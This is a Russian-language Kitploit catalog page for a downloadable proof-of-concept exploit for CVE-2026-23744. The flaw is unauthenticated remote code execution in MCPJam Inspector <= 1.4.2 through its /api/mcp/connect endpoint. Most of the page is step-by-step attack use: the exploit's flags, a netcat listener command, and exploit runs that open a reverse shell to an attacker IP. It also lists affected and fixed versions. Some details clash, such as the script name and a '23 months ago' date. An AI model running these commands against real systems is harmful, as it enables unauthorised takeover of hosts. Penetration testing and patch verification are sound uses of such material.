Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — эксплойт доказательства концепции для неаутентифицированной уязвимости удаленного выполнения кода в MCPJam Inspector <= 1.4.2. | Kitploit
Инструменты/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — эксплойт доказательства концепции для неаутентифицированной уязвимости удаленного выполнения кода в MCPJam Inspector <= 1.4.2.

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23744 — MCPJam Inspector: неаутентифицированное RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 по умолчанию привязывается к 0.0.0.0 и открывает /api/mcp/connect без какой-либо аутентификации. Конечная точка принимает объект serverConfig, который запускает процесс непосредственно на хосте — передача полезной нагрузки reverse shell дает немедленное RCE без необходимости в учетных данных.


Требования

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
ФлагОписаниеПо умолчанию
-uURL целиобязательно
-iВаш IP прослушивателя (LHOST)обязательно
-pВаш порт прослушивателя (LPORT)обязательно
-mМетод полезной нагрузки: busybox, bash, python3busybox

Пример reverse shell

Шаг 1 — Запустите свой прослушиватель:

root@kitploit:~
nc -lvnp 4444

Шаг 2 — Запустите эксплойт:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Методы полезной нагрузки

Если busybox не работает на цели, попробуйте другие методы:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Затронутые версии

ПрограммаУязвимаяИсправленная
MCPJam Inspector<= 1.4.21.4.3

Ссылки

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Скачать инструмент